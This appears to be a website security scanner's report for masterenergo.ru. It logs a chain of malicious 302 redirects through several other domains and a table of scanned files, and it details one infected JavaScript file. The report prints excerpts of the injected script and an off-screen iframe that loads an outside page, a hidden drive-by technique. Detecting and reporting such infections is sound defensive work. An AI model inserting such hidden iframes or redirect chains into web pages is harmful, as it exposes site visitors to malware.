Malicious/Suspicious Redirects
Redirect chain observed: masterenergo.ru -> alfsystem.com.my -> www.csra.de -> jbtconsultinggroup.com -> google.ru. Each request imitates a visitor arriving from a search engine (Google search Referer); each hop answers with a 302 and an empty body.

URL: http://masterenergo.ru/
  Request:
    GET / HTTP/1.1
    Host: masterenergo.ru
    Referer: http://www.google.com/search?q=redirect+check1
  Server response:
    HTTP/1.1 302 Moved Temporarily
    Connection: close
    Date: Wed, 16 Jul 2014 11:24:15 GMT
    Location: http://alfsystem.com.my/includes/domit/1.php
    Server: nginx
    Content-Length: 0
    Content-Type: text/html
    X-Powered-By: PHP/5.3.28
    X-Powered-By: PleskLin
  Status: malicious

URL: http://alfsystem.com.my/includes/domit/1.php
  Request:
    GET /includes/domit/1.php HTTP/1.1
    Host: alfsystem.com.my
    Referer: http://www.google.com/search?q=redirect+check2
  Server response:
    HTTP/1.1 302 Moved Temporarily
    Connection: close
    Date: Wed, 16 Jul 2014 11:24:15 GMT
    Location: http://www.csra.de/includes/domit/1.php
    Server: Apache
    Content-Length: 0
    Content-Type: text/html
    X-Powered-By: PHP/5.3.23
  Status: malicious

URL: http://www.csra.de/includes/domit/1.php
  Request:
    GET /includes/domit/1.php HTTP/1.1
    Host: www.csra.de
    Referer: http://www.google.com/search?q=redirect+check3
  Server response:
    HTTP/1.1 302 Moved Temporarily
    Connection: close
    Date: Wed, 16 Jul 2014 11:24:15 GMT
    Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
    Server: Apache
    Content-Length: 0
    Content-Type: text/html
    X-Powered-By: PHP/5.4.30
  Status: malicious

URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
  Request:
    GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1
    Host: jbtconsultinggroup.com
    Referer: http://www.google.com/search?q=redirect+check4
  Server response:
    HTTP/1.1 302 Moved Temporarily
    Connection: close
    Date: Wed, 16 Jul 2014 11:24:16 GMT
    Location: http://google.ru
    Server: Apache
    Vary: Accept-Encoding
    Content-Length: 0
    Content-Type: text/html
  Status: malicious
Scanned pages/files
| Request | Server response | Content-Length | Content-Type | Status |
|---|---|---|---|---|
| http://masterenergo.ru/ | 200 OK | 77742 | text/html | clean |
| http://masterenergo.ru/media/system/js/caption.js | 200 OK | 2931 | text/javascript | clean |
| http://code.jquery.com/jquery-1.3.2.min.js | 200 OK | 57254 | application/x-javascript | clean |
| http://masterenergo.ru/templates/master/js/jquery.jclock.js | 200 OK | 8419 | text/javascript | clean |
| http://masterenergo.ru/templates/master/js/jquery.mousewheel.min.js | 200 OK | 3501 | text/javascript | clean |
| http://masterenergo.ru/templates/master/js/jcarousellite_1.0.1.pack.js | 200 OK | 3032 | text/javascript | malicious |
| http://masterenergo.ru/templates/master/js/myjs.js | 200 OK | 3044 | text/javascript | clean |
| http://205.178.137.101/46tdr2U5.php?id= | 404 Not Found | 290 | text/html | clean |
| http://205.178.137.101/test404page.js | 404 Not Found | 292 | text/html | clean |
| http://masterenergo.ru//mc.yandex.ru/metrika/watch.js/ | 404 NOT FOUND | 40994 | text/html | clean |
| http://masterenergo.ru/oplata.html | 200 OK | 41918 | text/html | clean |
| http://masterenergo.ru/dostavka.html | 200 OK | 40457 | text/html | clean |
| http://masterenergo.ru/baur/view-all-products.html | 200 OK | 46134 | text/html | clean |
| http://masterenergo.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/default&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js | 200 OK | 59953 | text/javascript | clean |
| http://masterenergo.ru/chauvin-arnoux/view-all-products.html | 200 OK | 48436 | text/html | clean |

Details for http://masterenergo.ru/templates/master/js/jcarousellite_1.0.1.pack.js (malicious)

Malicious code - confirmed by antiviruses (see below)

Injected script (excerpt):

    (function(){
    function stripos (g_haystack, g_needle, g_offset) {
        var carpet = (g_haystack + '').toLowerCase();
        var fulisca = (g_needle + '').toLowerCase();
        var index = 0;
        if ((index = carpet.indexOf(fulisca, g_offset)) !== -1) { return index; }
        return false;
    }
    function CheckBrowser(){
        var badbrowserlist = ['Chrome','Android'];
        var anuchbrow = false;
        for (var i in badbrowserlist) {
            if (stripos(navigator.userAgent,

Decoded script (excerpt):

    (function($){$.fn.jCarouselLite=function(o){o=$.extend({btnPrev:null,btnNext:null,btnGo:null,mouseWheel:false,auto:null,speed:200,easing:null,vertical:false,circular:true,visible:3,start:0,scroll:1,beforeStart:null,afterEnd:null},o||{});return this.each(function(){var b=false,animCss=o.vertical?"top":"left",sizeCss=o.vertical?"height":"width";var c=$(this),ul=$("ul",c),tLi=$("li",ul),tl=tLi.size(),v=o.visible;if(o.circular){ul.prepend(tLi.slice(tl-v-1+1).clone()).append(tLi.slice(0,v).clone

Off-screen iframe (positioned at -3000px, outside the visible page):

    <iframe src="http://sunigali.billblog.co.uk/quality15.pittaro" style="position:absolute;left:-3000px;top:-3000px;" height="132" width="132"></iframe>

Antivirus reports:
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=masterenergo.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://masterenergo.ru/
Result: masterenergo.ru is not infected or malware details are not published yet.